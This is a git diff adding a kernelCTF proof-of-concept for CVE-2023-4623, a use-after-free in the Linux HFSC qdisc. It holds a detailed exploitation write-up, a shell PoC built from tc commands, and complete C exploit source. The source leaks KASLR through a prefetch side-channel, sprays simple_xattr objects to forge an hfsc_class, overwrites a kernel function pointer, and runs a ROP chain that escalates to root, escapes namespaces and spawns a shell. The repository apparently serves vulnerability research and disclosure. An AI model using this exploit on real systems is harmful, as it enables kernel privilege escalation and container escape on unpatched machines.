diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/exploit.md
new file mode 100644
index 00000000..78757bb4
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/exploit.md
@@ -0,0 +1,184 @@
+## Overview
+
+The vulnerability leads to a use-after-free on an `hfsc_class` object in `hfsc_dequeue()`. By replacing the vulnerable `hfsc_class` with a crafted `simple_xattr`, we can make `hfsc_dequeue()` perform a write-what-where. This is used to overwrite a function pointer in the kernel's `.data` section, which is then called to execute a ROP chain and escape the namespace. The kernel base slide, which is needed to determine the write primitive's target address and the ROP gadget addresses, is leaked using a prefetch timing side-channel.
+
+## Setup
+
+The exploit enters a new user namespace (in which it is root) followed by a new network namespace in order to get `CAP_NET_ADMIN`:
+
+```
+unshare(CLONE_NEWUSER);
+unshare(CLONE_NEWNET);
+```
+A temporary file is opened for the `simple_xattr` spray; extended attributes will later be attached to it:
+```
+xattr_fd = open("/tmp/", O_TMPFILE | O_RDWR, 0664);
+```
+If the kernel base is not provided on the command line, `kaslr_leak()` leaks it using a prefetch side-channel (see the final section for details).
+
+## Triggering the Vulnerability
+
+To trigger the vulnerability, we need to set up an HFSC qdisc and send packets to it. Two types of sockets are used: an `AF_NETLINK` socket for configuring the qdisc and an `AF_INET` socket for enqueueing packets at the qdisc. The qdisc is set up on `lo` by sending preconstructed messages to the Netlink socket. The `tf_msg` struct is used to represent the Netlink route messages, which are constructed in `init_nl_msgs()`. The following sequence of messages is sent:
+
+- `if_up_msg` sets `lo` up so that packets can be sent to the qdisc.
+- `newqd_msg` attaches an HFSC qdisc to `lo`.
+- `new_rsc_msg` adds a class with an RSC (real-time service curve) to the qdisc as a child of the root class.
+- `new_fsc_msg` adds a class with an FSC (link-sharing service curve) to the qdisc as a child of the RSC class.
+- At this point an `AF_INET` socket is opened and written to with `loopback_send()`. The message will be enqueued in the FSC class, causing the RSC class to be mistakenly added to the root class's `vt_tree`.
+- `delc_msg` deletes the FSC class, then another `delc_msg` deletes the RSC class, leaving a dangling pointer to the underlying `hfsc_class` object in the root class's `vt_tree`.
+
+## Write-What-Where
+
+The use-after-free is reached via [`hfsc_dequeue()`](https://elixir.bootlin.com/linux/v6.1.36/source/net/sched/sch_hfsc.c#L1570 "https://elixir.bootlin.com/linux/v6.1.36/source/net/sched/sch_hfsc.c#L1570"), which calls `vttree_get_minvt()`:
+
+```
+static struct hfsc_class *
+vttree_get_minvt(struct hfsc_class *cl, u64 cur_time)
+{
+    /* if root-class's cfmin is bigger than cur_time nothing to do */
+    if (cl->cl_cfmin > cur_time)
+        return NULL;
+
+    while (cl->level > 0) {
+        cl = vttree_firstfit(cl, cur_time);
+        if (cl == NULL)
+            return NULL;
+        /*
+         * update parent's cl_cvtmin.
+         */
+        if (cl->cl_parent->cl_cvtmin < cl->cl_vt)
+            cl->cl_parent->cl_cvtmin = cl->cl_vt;
+    }
+    return cl;
+}
+```
+
+The loop will eventually assign our dangling pointer to `cl`. Then the line
+```
+cl->cl_parent->cl_cvtmin = cl->cl_vt;
+```
+gives us an 8-byte write-what-where primitive, with the restriction that the value written must be greater than the value it replaces. This primitive is used to overwrite the `qfq_qdisc_ops.change()` function pointer in the kernel's `.data` section with a JOP gadget. Since the QFQ qdisc does not define a change function, `qfq_qdisc_ops.change()` is initially `NULL` and can be overwritten with any value.
+
+A `simple_xattr` is used to store the target address and value.
The exploit uses `spray_simple_xattrs()` to add attributes to a temporary file, which sprays the `kmalloc-1024` cache, where the vulnerable `hfsc_class` is located, with `simple_xattr` objects.
+
+The `value` field of the `simple_xattr` is filled with a fake `hfsc_class`. The following fields have to be faked:
+
+- `cl_parent`: The address to write to minus `offsetof(hfsc_class, cl_cvtmin)`. Set to the address of `qfq_qdisc_ops.change()`.
+- `cl_vt`: The 8-byte value to write. Set to the address of a JOP gadget.
+- `cl_f`: Set to zero to satisfy the `p->cl_f <= cur_time` condition in `vttree_firstfit()`.
+- `level`: Set to a non-zero value to prevent `vttree_get_minvt()` from returning the dangling pointer and causing further use-after-frees.
+- `vt_node`: This is the red-black tree node that the vulnerable class is accessed through. We make this a black node with `NULL` children to prevent crashes in `init_vf()` and `vttree_get_minvt()`.
+- `vt_node.__rb_parent_color`: Set to 1, coloring the node black.
+- `vt_node.rb_right`: Set to `NULL` so that it is not dereferenced.
+- `vt_node.rb_left`: Set to `NULL` so that it is not dereferenced.
+- `cf_node`: There is another dangling pointer to the vulnerable class from the root class's `cf_tree`. This is filled in the same way as `vt_node` to prevent a crash in `init_vf()` but is not otherwise relevant.
+
+Once a `simple_xattr` has been allocated over the vulnerable `hfsc_class`, another FSC class is created with `new_fsc_msg` so that the qdisc has somewhere to enqueue packets (`hfsc_dequeue()` will return early if the qdisc is empty). The write-what-where in `hfsc_dequeue()` is then triggered by sending an `AF_INET` packet with the `loopback_send()` helper function.
+
+## ROP Chain
+
+Now that `qfq_qdisc_ops.change()` has been overwritten, it can be called by sending the `new_qfq_qdisc` message to a Netlink socket.
The kernel will then call the overwritten pointer from `qdisc_change()` with `rsi` pointing to the middle of the sent message. The data around `rsi` is attacker-controlled and contains the ROP chain.
+
+The `new_qfq_qdisc` message is constructed with two consecutive `TCA_OPTIONS` attributes, each of which consists of a 4-byte `rtattr` header followed by a data buffer. When the overwritten function is called, `rsi` will point to the second attribute, whose data buffer stores a ROP chain copied from `rop_buf`. The preceding attribute's buffer contains a single gadget, copied from `jop_buf` and found at `rsi - 0x70` when the chain is executed.
+
+The chain starts by calling the JOP gadget stored at `qfq_qdisc_ops.change()`:
+```
+push rsi ; jmp qword ptr [rsi - 0x70]
+```
+The gadget at `rsi - 0x70` then completes the stack pivot to the ROP chain at `rsi + 8` (the offset of `8` is needed to skip the `rtattr` header):
+```
+pop rsp ; pop rbx ; jmp __x86_return_thunk // rsi - 0x70
+```
+The ROP chain starts by copying `rdi` into `rbx`, which restores `rbx`'s previous value:
+```
+push rdi ; pop rbx ; pop rbp ; jmp __x86_return_thunk // rsi + 0x8
+0
+```
+This is necessary because the chain will eventually return back to the kernel stack and `rbx` is callee-saved. After this, the usual privilege escalation and namespace escape are performed using `commit_creds()` and `switch_task_namespaces()`:
+```
+pop rdi ; jmp __x86_return_thunk
+0
+prepare_kernel_cred()
+pop rcx ; jmp __x86_return_thunk
+commit_creds()
+mov rdi, rax ; jmp __x86_indirect_thunk_rcx
+pop rdi ; jmp __x86_return_thunk
+1
+find_task_by_vpid()
+pop rsi ; jmp __x86_return_thunk
+init_ns_proxy
+pop rcx ; jmp __x86_return_thunk
+switch_task_namespaces()
+mov rdi, rax ; jmp __x86_indirect_thunk_rcx
+```
+
+The ROP chain ends by pivoting back to the previous frame on the kernel stack. A kernel stack pointer can be read from `r14` on the LTS instance and `r13` on the COS instance.
An offset of `-384` or `-368` is added to this pointer to get the location of the target frame on LTS and COS, respectively. Here are the gadgets for LTS:
+
+```
+mov rax, r14 ; pop r14 ; jmp __x86_return_thunk
+0
+pop rdx ; jmp __x86_return_thunk
+pop r14 ; jmp __x86_return_thunk
+push rax ; jmp __x86_indirect_thunk_rdx
+pop rcx ; jmp __x86_return_thunk
+-384
+add rax, rcx ; jmp __x86_return_thunk
+pop rdx ; jmp __x86_return_thunk
+pop rsp ; jmp __x86_return_thunk
+push rax ; jmp __x86_indirect_thunk_rdx
+```
+and COS:
+```
+mov rax, r13 ; pop r13 ; pop rbp ; jmp __x86_return_thunk
+0
+0
+pop rsi ; jmp __x86_return_thunk
+-368
+add rax, rsi ; jmp __x86_return_thunk
+pop rdx ; jmp __x86_return_thunk
+pop rsp ; jmp __x86_return_thunk
+push rax ; jmp __x86_indirect_thunk_rdx
+```
+
+## Infoleak with Prefetch Timing Side-channel
+
+A simple implementation of the prefetch timing side-channel (described in this [P0 blog post](https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html "https://googleprojectzero.blogspot.com/2022/12/exploiting-CVE-2022-42703-bringing-back-the-stack-attack.html") and originally from this [paper](https://gruss.cc/files/prefetch.pdf "https://gruss.cc/files/prefetch.pdf") by Daniel Gruss et al.) is used to bypass KASLR. This side-channel exploits timing differences in `prefetch` instructions based on whether the target address is mapped and on the cache state.
+
+Addresses which are mapped and have been recently accessed have a faster prefetch time than unmapped addresses (`prefetch` itself does not count as an access here). We access `sys_getuid()` by calling `getuid()` and then measure prefetch times for all possible locations of `sys_getuid()`. The target instance's kernel base is always located at a `0x1000000`-aligned address between `0xffffffff81000000` and `0xffffffffbb000000`, so there are 59 candidate addresses to test.
+
+The attack first finds the minimum prefetch time `min` for the unmapped address `0xffffffff80000000`. Prefetch times for other unmapped addresses will likely be greater than or equal to `min`, so any address with a faster prefetch time is assumed to be mapped. The lowest mapped address found this way is taken to be the kernel base.
+
+```
+#define MIN_STEXT 0xffffffff81000000
+#define MAX_STEXT 0xffffffffbb000000
+#define BASE_INC 0x1000000
+
+long kaslr_leak (int tries1, int tries2) {
+    long base = -1, addr;
+    size_t time;
+    size_t min = -1;
+
+    addr = 0xffffffff80000000;
+    for (int i = 0; i < tries1; i++) {
+        time = onlyreload(addr);
+        min = min < time ? min : time;
+    }
+
+    for (int i = 0; i < tries2; i++) {
+        for (addr = MIN_STEXT; addr <= MAX_STEXT; addr += BASE_INC) {
+            time = onlyreload(addr + SYS_GETUID);
+            if (time < min && addr < base) {
+                base = addr;
+            }
+        }
+    }
+    return base;
+}
+```
+
+The prefetch timing assembly code in `onlyreload()` is taken from Daniel Gruss's [repository](https://github.com/IAIK/prefetch "https://github.com/IAIK/prefetch") with `cpuid` replaced by `mfence` as suggested in the P0 blog post.
+
+The original exploit did not preload the target address, but the leak will not work reliably without this on the current server (likely due to increased cache activity).
+
+This implementation of the side-channel works on the Intel Xeon CPU used by the live instance but not the AMD CPU used by the exploit_repro instance, since there is no timing difference between the two cases it tests for on AMD.
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/vulnerability.md
new file mode 100644
index 00000000..313bb70e
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/docs/vulnerability.md
@@ -0,0 +1,35 @@
+## Vulnerability Details
+
+There is a use-after-free in the traffic control system's HFSC qdisc when an HFSC class with link-sharing has a parent without link-sharing. When a packet is enqueued at the child class, `init_vf()` will call `vttree_insert()` on the parent. However, when the packet is dequeued, `vttree_remove()` will be skipped in `update_vf()` since the parent does not have the `HFSC_FSC` flag set. This leaves a dangling pointer which can be exploited to cause a use-after-free and achieve privilege escalation.
+
+The vulnerability has been present since the HFSC qdisc was introduced in kernel version 2.6.3. It was fixed in version 6.5 with commit `b3d26c5702c7 ("net/sched: sch_hfsc: Ensure inner classes have fsc curve")`. This commit made it impossible for classes without link-sharing curves to become parents, since only inner classes with link-sharing curves are meaningful in the HFSC protocol.
+
+Triggering the vulnerability requires `CONFIG_NET_SCH_HFSC` to be enabled in the kernel configuration. The user must have the `CAP_NET_ADMIN` capability to trigger the vulnerability, which can be gained with access to unprivileged user namespaces. Disabling unprivileged user namespaces prevents the vulnerability from being exploited for privilege escalation.
+
+## POC
+```
+# Set lo up
+ip link set lo up
+
+# Create the HFSC qdisc and root class.
+tc qdisc add dev lo parent root handle 1: hfsc def 2
+
+# Add a real-time class as a child of the root class.
+tc class add dev lo parent 1: classid 1:1 hfsc rt umax 1 dmax 1 rate 1
+
+# Add a link-sharing class as a child of the real-time class.
+tc class add dev lo parent 1:1 classid 1:2 hfsc ls umax 1 dmax 1 rate 1 + +# Enqueue packet at link-sharing class, which calls init_vf() on it. +ping -c1 localhost + +# Delete the parent and child classes, leaving a dangling pointer. +tc class del dev lo classid 1:2 +tc class del dev lo classid 1:1 + +# Add a link-sharing class to enqueue packets to (if the queue is empty, hfsc_dequeue() will return before reaching the UaF) +tc class add dev lo parent 1: classid 1:2 hfsc ls umax 1 dmax 1 rate 1 + +# Trigger use after free in hfsc_dequeue() +ping -c1 localhost +``` \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/Makefile b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/Makefile new file mode 100644 index 00000000..0a07db56 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/Makefile @@ -0,0 +1,6 @@ +CFLAGS = -Wno-incompatible-pointer-types -Wno-format -static + +exploit: exploit.c + +run: + ./exploit diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/exploit b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/exploit new file mode 100644 index 00000000..fc4f3b4c Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/exploit.c b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/exploit.c new file mode 100644 index 00000000..66f15079 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/cos-97-16919.353.23/exploit.c @@ -0,0 +1,479 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +/* Prefetch kaslr leak */ +#define MIN_STEXT 0xffffffff81000000 +#define MAX_STEXT 
0xffffffffbb000000 +#define BASE_INC 0x1000000 +#define SYS_GETUID 0x0f41c0 + +/* simple_xattr spray */ +#define XATTR_SPRAY 32 +#define XATTR_HEADER_SIZE 32 +#define XATTR_SLAB_LEN 1024 +#define XATTR_DATA_LEN (XATTR_SLAB_LEN/2) + +/* hfsc_class offsets */ +#define LEVEL_OFFSET 92 +#define CL_PARENT_OFFSET 104 +#define VT_NODE_OFFSET 184 +#define CF_NODE_OFFSET 216 +#define CL_VT_OFFSET 272 +#define CL_CVTMIN_OFFSET 304 + +/* Data offsets */ +#define INIT_NSPROXY 0x22670c0 +#define QFQ_CHANGE_QDISC_LOC 0x25106f8 + +/* Function offsets */ +#define PREPARE_KERNEL_CRED 0x10b5e0 +#define COMMIT_CREDS 0x10b360 +#define FIND_TASK_BY_VPID 0x102440 +#define SWITCH_TASK_NAMESPACES 0x109830 + +/* Gadget offsets */ +#define PUSH_RSI_JMP_QWORD_PTR_RSI_MINUS_0x70 0xba80ec +#define PUSH_RDI_POP_RBX_RET_THUNK 0x74cf18 +#define POP_RSP_POP_RBX_RET_THUNK 0x791fcf +#define POP_RDI_RET_THUNK 0x117d6f +#define POP_RSI_RET_THUNK 0x177d1c +#define POP_RDX_RET_THUNK 0x06238d +#define POP_RCX_RET_THUNK 0x02582c +#define MOV_RDI_RAX_THUNK_RCX 0x34d9cd + +#define MOV_RAX_R13_POP_RBX_POP_RBP_RET_THUNK 0x58391d +#define ADD_RAX_RSI_RET_THUNK 0x077d1a +#define PUSH_RAX_JMP_RDX_THUNK 0x832707 +#define POP_RSP_RET_THUNK 0x1c7db8 + + +#define err_exit(s) do { perror(s); exit(EXIT_FAILURE); } while(0) + +struct tf_msg { + struct nlmsghdr nh; + struct tcmsg tm; +#define TC_DATA_LEN 512 + char attrbuf[TC_DATA_LEN]; +}; + +struct if_msg { + struct nlmsghdr nh; + struct ifinfomsg ifi; +}; + +/* Netlink message for setting loopback up. 
*/ +struct if_msg if_up_msg = { + { + .nlmsg_len = 32, + .nlmsg_type = RTM_NEWLINK, + .nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK, + }, + { + .ifi_family = AF_UNSPEC, + .ifi_type = ARPHRD_NETROM, + .ifi_index = 1, + .ifi_flags = IFF_UP, + .ifi_change = 1, + }, + +}; + + +int xattr_fd; +char rop_buf[512]; +char jop_buf[0x70]; + +void pin_cpu (int cpu) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(cpu, &set); + if (sched_setaffinity(0, sizeof(set), &set)) + err_exit("[-] sched_setaffinity"); +} + +/* + * Prefetch timing code from Daniel Gruss. + * https://github.com/IAIK/prefetch + */ + +inline __attribute__((always_inline)) size_t rdtsc_begin () { + size_t a, d; + asm volatile ( + "mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "mfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + +inline __attribute__((always_inline)) size_t rdtsc_end () { + size_t a, d; + asm volatile( + "xor %%rax, %%rax\n\t" + "mfence\n\t" + "RDTSCP\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r" (d), "=r" (a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + a = (d<<32) | a; + return a; +} + +void prefetch (void* p) { + asm volatile ("prefetchnta (%0)" : : "r" (p)); + asm volatile ("prefetcht2 (%0)" : : "r" (p)); +} + +size_t onlyreload (void* addr) { + size_t time = rdtsc_begin(); + prefetch(addr); + size_t delta = rdtsc_end() - time; + return delta; +} + +/* + * Simple implementation of prefetch sidechannel to + * bypass KASLR. + */ + +long kaslr_leak (int tries1, int tries2) { + long base = -1, addr; + size_t time; + size_t min = -1; + + addr = 0xffffffff80000000; + for (int i = 0; i < tries1; i++) { + time = onlyreload(addr); + min = min < time ? 
min : time; + } + + for (int i = 0; i < tries2; i++) { + for (addr = MIN_STEXT; addr <= MAX_STEXT; addr += BASE_INC) { + time = onlyreload(addr + SYS_GETUID); + if (time < min && addr < base) { + base = addr; + } + } + } + return base; +} + +void init_rop (long *rop, long *jop, long kbase) { + *jop++ = kbase + POP_RSP_POP_RBX_RET_THUNK; + /* commit_creds(prepare_kernel_cred(0)) */ + *rop++ = kbase + POP_RDI_RET_THUNK; + *rop++ = 0; + *rop++ = kbase + PREPARE_KERNEL_CRED; + *rop++ = kbase + POP_RCX_RET_THUNK; + *rop++ = kbase + COMMIT_CREDS; + *rop++ = kbase + MOV_RDI_RAX_THUNK_RCX; + /* switch_task_namespaces(find_task_by_vpid(1, init_ns_proxy) */ + *rop++ = kbase + POP_RDI_RET_THUNK; + *rop++ = 1; + *rop++ = kbase + FIND_TASK_BY_VPID; + *rop++ = kbase + POP_RSI_RET_THUNK; + *rop++ = kbase + INIT_NSPROXY; + *rop++ = kbase + POP_RCX_RET_THUNK; + *rop++ = kbase + SWITCH_TASK_NAMESPACES; + *rop++ = kbase + MOV_RDI_RAX_THUNK_RCX; + /* return back to the original stack */ + *rop++ = kbase + MOV_RAX_R13_POP_RBX_POP_RBP_RET_THUNK; + rop++; + rop++; + *rop++ = kbase + POP_RSI_RET_THUNK; + *rop++ = (long)-0x170; + *rop++ = kbase + ADD_RAX_RSI_RET_THUNK; + *rop++ = kbase + POP_RDX_RET_THUNK; + *rop++ = kbase + POP_RSP_RET_THUNK; + *rop++ = kbase + PUSH_RAX_JMP_RDX_THUNK; +} + +/* Helper functions for creating rtnetlink messages. */ + +unsigned short add_rtattr (struct rtattr *rta, unsigned short type, unsigned short len, char *data) { + rta->rta_type = type; + rta->rta_len = RTA_LENGTH(len); + memcpy(RTA_DATA(rta), data, len); + return rta->rta_len; +} + +int vuln_class_id = 0x00010001; // 1:1, classid of vulnerable RSC parent. +int def_class_id = 0x00010002; // 1:2, classid where packets are enqueued. 
+struct tf_msg newqd_msg, delc_msg, new_rsc_msg, new_fsc_msg, new_qfq_qdisc; + +void init_tf_msg (struct tf_msg *m) { + m->nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + m->tm.tcm_family = PF_UNSPEC; + m->tm.tcm_ifindex = if_nametoindex("lo"); + m->nh.nlmsg_len = NLMSG_LENGTH(sizeof(m->tm)); +} + +void init_qdisc_msg (struct tf_msg *m) { + init_tf_msg(m); + m->nh.nlmsg_type = RTM_NEWQDISC; + m->tm.tcm_parent = -1; + m->tm.tcm_handle = 1 << 16; + m->nh.nlmsg_flags |= NLM_F_CREATE; + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_KIND, strlen("hfsc") + 1, "hfsc")); + struct rtattr *opts = (char *)m + NLMSG_ALIGN(m->nh.nlmsg_len); + short def = 2; + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_OPTIONS, 2, &def)); +} + + +void init_rsc_class_msg (struct tf_msg *m) { + init_tf_msg(m); + m->nh.nlmsg_type = RTM_NEWTCLASS; + m->tm.tcm_parent = 1 << 16; + m->tm.tcm_handle = vuln_class_id; + m->nh.nlmsg_flags |= NLM_F_CREATE; + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_KIND, strlen("hfsc") + 1, "hfsc")); + struct rtattr *opts = (char *)m + NLMSG_ALIGN(m->nh.nlmsg_len); + opts->rta_type = TCA_OPTIONS; + opts->rta_len = RTA_LENGTH(0); + int rsc[3] = {1, 1, 1}; + opts->rta_len += RTA_ALIGN(add_rtattr((char *)opts + opts->rta_len, TCA_HFSC_RSC, sizeof(rsc), rsc)); + m->nh.nlmsg_len += NLMSG_ALIGN(opts->rta_len); +} + +void init_fsc_class_msg (struct tf_msg *m) { + init_tf_msg(m); + m->nh.nlmsg_type = RTM_NEWTCLASS; + m->tm.tcm_parent = vuln_class_id; + m->tm.tcm_handle = def_class_id; + m->nh.nlmsg_flags |= NLM_F_CREATE; + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_KIND, strlen("hfsc") + 1, "hfsc")); + struct rtattr *opts = (char *)m + NLMSG_ALIGN(m->nh.nlmsg_len); + opts->rta_type = TCA_OPTIONS; + opts->rta_len = RTA_LENGTH(0); + int fsc[3] = {1, 1, 1}; + opts->rta_len += RTA_ALIGN(add_rtattr((char *)opts + 
opts->rta_len, TCA_HFSC_FSC, sizeof(fsc), fsc)); + m->nh.nlmsg_len += NLMSG_ALIGN(opts->rta_len); +} + +void init_del_class_msg (struct tf_msg *m) { + init_tf_msg(m); + m->nh.nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK; + m->nh.nlmsg_type = RTM_DELTCLASS; + m->tm.tcm_handle = vuln_class_id; +} + +void init_qfq_qdisc_msg (struct tf_msg *m) { + init_tf_msg(m); + m->nh.nlmsg_type = RTM_NEWQDISC; + m->tm.tcm_parent = 0x00010002; + m->tm.tcm_handle = 2 << 16; + m->nh.nlmsg_flags |= NLM_F_CREATE; + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_KIND, strlen("qfq") + 1, "qfq")); + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_OPTIONS, sizeof(jop_buf), jop_buf)); + m->nh.nlmsg_len += NLMSG_ALIGN(add_rtattr((char *)m + NLMSG_ALIGN(m->nh.nlmsg_len), TCA_OPTIONS, sizeof(rop_buf), rop_buf)); +} + +void init_nl_msgs (void) { + init_qdisc_msg(&newqd_msg); + init_del_class_msg(&delc_msg); + init_rsc_class_msg(&new_rsc_msg); + init_fsc_class_msg(&new_fsc_msg); +} + +/* + * Send a Netlink message and check for error + */ +void netlink_write (int sock, struct tf_msg *m) { + struct { + struct nlmsghdr nh; + struct nlmsgerr ne; + } ack; + if (write(sock, m, m->nh.nlmsg_len) == -1) + err_exit("[-] write"); + if (read(sock , &ack, sizeof(ack)) == -1) + err_exit("[-] read"); + if (ack.ne.error) { + errno = -ack.ne.error; + perror("[-] netlink"); + } +} + +void netlink_write_noerr (int sock, struct tf_msg *m) { + if (write(sock, m, m->nh.nlmsg_len) == -1) + err_exit("[-] write"); +} + +/* + * Allocate simple_xattr objects. + */ +int num_xattr = 0; +char xattr_buf[XATTR_DATA_LEN]; +void spray_simple_xattrs(int num_spray) { + char name[32]; + for (int i = 0; i < num_spray; i++, num_xattr++) { + sprintf(name, "security.%d", num_xattr); + if (fsetxattr(xattr_fd, name, xattr_buf, XATTR_DATA_LEN, 0) == -1) + err_exit("[-] fsetxattr"); + } +} + +/* + * Send a message on the loopback device. 
Used to trigger qdisc enqueue and + * dequeue functions. + */ +void loopback_send (void) { + struct sockaddr iaddr = { AF_INET }; + int inet_sock_fd = socket(PF_INET, SOCK_DGRAM, 0); + if (inet_sock_fd == -1) + err_exit("[-] inet socket"); + if (connect(inet_sock_fd, &iaddr, sizeof(iaddr)) == -1) + err_exit("[-] connect"); + if (write(inet_sock_fd, "", 1) == -1) + err_exit("[-] inet write"); + close(inet_sock_fd); +} + +int main (int argc, char **argv) { + long kernel_base; + + pin_cpu(0); + + /* Get kernel base from command line or prefetch side channel */ + if (argc > 1) { + kernel_base = strtoul(argv[1], NULL, 16); + printf("[*] Using provided kernel base: %p\n", kernel_base); + } else { + printf("[*] Using prefetch to leak kernel base...\n"); + getuid(); + kernel_base = kaslr_leak(1000, 1000); + if (kernel_base == -1) { + printf("[*] Prefetch failed\n"); + exit(EXIT_FAILURE); + } + printf("[*] Leaked kernel base: %p\n", kernel_base); + } + + if (unshare(CLONE_NEWUSER) == -1) + err_exit("[-] unshare(CLONE_NEWUSER)"); + if (unshare(CLONE_NEWNET) == -1) + err_exit("[-] unshare(CLONE_NEWNET)"); + + /* Open temporary file to use for xattr spray */ + xattr_fd = open("/tmp/", O_TMPFILE | O_RDWR, 0664); + if (xattr_fd == -1) + err_exit("[-] open"); + + /* Open socket to send netlink commands to */ + int nl_sock_fd = socket(PF_NETLINK, SOCK_RAW, NETLINK_ROUTE); + if (nl_sock_fd == -1) + err_exit("[-] nl socket"); + + /* Set loopback device up */ + if_up_msg.ifi.ifi_index = if_nametoindex("lo"); + netlink_write(nl_sock_fd, &if_up_msg); + + init_nl_msgs(); + + /* Trigger vuln */ + netlink_write(nl_sock_fd, &newqd_msg); + netlink_write(nl_sock_fd, &new_rsc_msg); + netlink_write(nl_sock_fd, &new_fsc_msg); + loopback_send(); + delc_msg.tm.tcm_handle = def_class_id; + netlink_write(nl_sock_fd, &delc_msg); + + printf("[*] Triggered vulnerability\n"); + + /* Place fake hfsc_class in xattr */ + + /* hfsc_class.level = 1 (must be non-zero) */ + xattr_buf[LEVEL_OFFSET - 
XATTR_HEADER_SIZE] = 1; + /* hfsc_class.vt_node = 1 (must be odd) */ + xattr_buf[VT_NODE_OFFSET - XATTR_HEADER_SIZE] = 1; + /* hfsc_class.cf_node = 1 (must be odd) */ + xattr_buf[CF_NODE_OFFSET - XATTR_HEADER_SIZE] = 1; + /* hfsc_class.parent = &qfq_change_qdisc (write target)*/ + long parent = kernel_base + QFQ_CHANGE_QDISC_LOC - CL_CVTMIN_OFFSET; + memcpy(xattr_buf + CL_PARENT_OFFSET - XATTR_HEADER_SIZE, &parent, 8); + /* hfsc_class.cl_vt = jop_gadget (write value) */ + long cl_vt = kernel_base + PUSH_RSI_JMP_QWORD_PTR_RSI_MINUS_0x70; + memcpy(xattr_buf + CL_VT_OFFSET - XATTR_HEADER_SIZE, &cl_vt, 8); + + printf("[*] Spraying simple_xattrs...\n"); + /* Spray simple_xattrs */ + delc_msg.tm.tcm_handle = vuln_class_id; + netlink_write(nl_sock_fd, &delc_msg); + spray_simple_xattrs(XATTR_SPRAY); + + /* Create new default class and trigger enqueue/dequeue to overwrite + * qfq_change_qdisc with jop gadget */ + new_fsc_msg.tm.tcm_parent = 1 << 16; + netlink_write(nl_sock_fd, &new_fsc_msg); + + printf("[*] Overwriting function pointer\n"); + loopback_send(); + + /* Prepare ROP chain at an offset of 4 bytes. 
With the 4-byte rtattr + header it will be at an 8-byte offset from rsi, allowing it to be reached + with `push rsi ; pop rsp ; pop rbx` for the stack pivot */ + init_rop(rop_buf + 4, jop_buf, kernel_base); + + /* Create QFQ qdisc */ + init_qfq_qdisc_msg(&new_qfq_qdisc); + netlink_write_noerr(nl_sock_fd, &new_qfq_qdisc); + + + /* Call overwritten function pointer */ + printf("[*] Triggering ROP chain\n"); + netlink_write_noerr(nl_sock_fd, &new_qfq_qdisc); + + if (getuid()) { + printf("[-] Privesc failed\n"); + exit(EXIT_FAILURE); + } + + printf("[+] Returned from ROP\n"); + + int mntns_fd = open("/proc/1/ns/mnt", O_RDONLY); + if (mntns_fd == -1) + perror("[-] open(/proc/1/ns/mnt)"); + + int netns_fd = open("/proc/1/ns/net", O_RDONLY); + if (netns_fd == -1) + perror("[-] open(/proc/1/ns/net)"); + + int pidns_fd = open("/proc/1/ns/pid", O_RDONLY); + if (pidns_fd == -1) + perror("[-] open(/proc/1/ns/pid)"); + + + if (setns(mntns_fd, CLONE_NEWNS) == -1) + perror("[-] setns mnt"); + if (setns(netns_fd, CLONE_NEWNET) == -1) + perror("[-] setns net"); + if (setns(pidns_fd, CLONE_NEWPID) == -1) + perror("[-] setns pid"); + + printf("[*] Launching shell\n"); + system("/bin/sh"); +} diff --git a/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/lts-6.1.36/Makefile b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/lts-6.1.36/Makefile new file mode 100644 index 00000000..0a07db56 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4623_lts_cos/exploit/lts-6.1.36/Makefile @@ -0,0 +1,6 @@ +CFLAGS = -Wno-incompatible-pointer-types 